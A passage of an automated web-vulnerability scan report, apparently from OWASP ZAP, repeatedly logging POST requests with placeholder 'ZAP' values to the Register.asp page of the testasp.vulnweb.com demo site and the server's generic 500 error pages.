tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
